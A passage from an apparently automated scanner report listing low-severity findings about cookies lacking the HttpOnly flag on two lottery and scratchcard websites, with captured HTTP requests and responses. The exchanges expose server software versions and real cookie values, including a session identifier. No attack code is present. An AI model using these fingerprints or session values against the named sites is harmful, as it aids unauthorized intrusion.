Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Connection: close
Content-Length: 10718

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
               <link rel="sh
...[SNIP]...

12.300. http://www.postcodelottery.com/Games/Scratchcards.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.postcodelottery.com
Path:   /Games/Scratchcards.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Games/Scratchcards.htm HTTP/1.1
Host: www.postcodelottery.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 16 May 2011 11:41:43 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 11:41:43 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Location: http://www.postcodelottery.com/FunGames/PaidGames/PostcodeLotteryScratch.htm
Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Content-Length: 0


12.301. http://www.postcodelottery.com/Home.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.postcodelottery.com
Path:   /Home.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.htm HTTP/1.1
Host: www.postcodelottery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91262363.1305546112.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BALANCEID=balancer.route1; __utma=91262363.1689585513.1305546112.1305546112.1305546112.1; __utmc=91262363; __utmb=91262363.1.10.1305546112;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:22:11 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 12:22:12 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Connection: close
Content-Length: 14838

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
               <link rel="sh
...[SNIP]...

12.302. http://www.postcodelottery.com/HowItWorks.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.postcodelottery.com
Path:   /HowItWorks.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HowItWorks.htm HTTP/1.1
Host: www.postcodelottery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91262363.1305546112.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BALANCEID=balancer.route1; __utma=91262363.1689585513.1305546112.1305546112.1305546112.1; __utmc=91262363; __utmb=91262363.1.10.1305546112;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:22:18 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 12:22:19 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Connection: close
Content-Length: 15444

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
               <link rel="sh
...[SNIP]...

12.303. http://www.postcodelottery.com/MyAccount.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.postcodelottery.com
Path:   /MyAccount.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /MyAccount.htm HTTP/1.1
Host: www.postcodelottery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91262363.1305546112.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BALANCEID=balancer.route1; __utma=91262363.1689585513.1305546112.1305546112.1305546112.1; __utmc=91262363; __utmb=91262363.1.10.1305546112;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:22:36 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 12:22:36 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Connection: close
Content-Length: 16408

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
               <link rel="short
...[SNIP]...

12.304. http://www.postcodelottery.com/RSS.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.postcodelottery.com
Path:   /RSS.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /RSS.htm HTTP/1.1
Host: www.postcodelottery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91262363.1305546112.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BALANCEID=balancer.route1; __utma=91262363.1689585513.1305546112.1305546112.1305546112.1; __utmc=91262363; __utmb=91262363.1.10.1305546112;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:22:07 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 12:22:08 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Content-Type: text/xml;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Connection: close
Content-Length: 76958

<?xml version="1.0" ?>
<rss version="2.0">
                       <channel>
   <title>RSS</title>
   <link>http://www.postcodelottery.com/RSS.htm</link>
   <description></description>
           <item>
               <title>A Breath Of Fres
...[SNIP]...

12.305. http://www.postcodelottery.com/Sitemap.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.postcodelottery.com
Path:   /Sitemap.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Sitemap.htm HTTP/1.1
Host: www.postcodelottery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91262363.1305546112.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BALANCEID=balancer.route1; __utma=91262363.1689585513.1305546112.1305546112.1305546112.1; __utmc=91262363; __utmb=91262363.1.10.1305546112;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:23:39 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 12:23:39 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Connection: close
Content-Length: 10146

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
               <link rel="sh
...[SNIP]...

12.306. https://www.postcodelottery.com/PlayNOW/OrderYourTickets.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.postcodelottery.com
Path:   /PlayNOW/OrderYourTickets.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PlayNOW/OrderYourTickets.htm HTTP/1.1
Host: www.postcodelottery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=91262363.1305546112.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BALANCEID=balancer.route1; __utma=91262363.1689585513.1305546112.1305546112.1305546112.1; __utmc=91262363; __utmb=91262363.1.10.1305546112;

Response

HTTP/1.0 200 OK
Date: Mon, 16 May 2011 12:32:10 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Last-Modified: Mon, 16 May 2011 12:32:10 GMT
Cache-Control: private, must-revalidate
Expires: Wed, 16 Aug 2000 10:00:00 GMT
Content-Type: text/html;charset=utf-8
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Set-Cookie: BALANCEID=balancer.route1; path=/; domain=.postcodelottery.com
Vary: Accept-Encoding
Connection: close

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
       <html xmlns="http://www.w3.org/1999/xhtml">
           <head>
               <link rel="short
...[SNIP]...

12.307. http://www.primescratchcards.com/HelpDepositMethods.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /HelpDepositMethods.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /HelpDepositMethods.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:54 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 28284
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:54 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

12.308. http://www.primescratchcards.com/InviteFriend.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /InviteFriend.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /InviteFriend.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:32 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 26530
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:32 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

12.309. http://www.primescratchcards.com/Responsible.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /Responsible.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Responsible.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:50 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 23384
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:50 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

12.310. http://www.primescratchcards.com/SecurityAndPrivacy.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /SecurityAndPrivacy.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /SecurityAndPrivacy.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:49 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 20508
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:48 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

12.311. http://www.primescratchcards.com/aboutus.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /aboutus.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: ARC. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /aboutus.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:30 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 21887
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:30 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

12.312. http://www.primescratchcards.com/affiliates.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /affiliates.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: ARC. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /affiliates.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:35 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 23594
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:34 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

12.313. http://www.primescratchcards.com/contactus.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /contactus.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: ARC. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /contactus.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:52 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 25485
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:52 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

12.314. http://www.primescratchcards.com/fairplay.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /fairplay.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: ARC. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fairplay.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:31 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 22256
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:30 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

12.315. http://www.primescratchcards.com/help.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /help.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: ARC. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /help.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:34 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 20735
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:34 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

12.316. http://www.primescratchcards.com/media.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /media.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: ARC. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:53 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 22031
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:52 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

12.317. http://www.primescratchcards.com/playersclub.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /playersclub.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: ARC. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /playersclub.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:32 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 25777
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:32 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

12.318. http://www.primescratchcards.com/promotions.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /promotions.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: ARC. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /promotions.asp HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
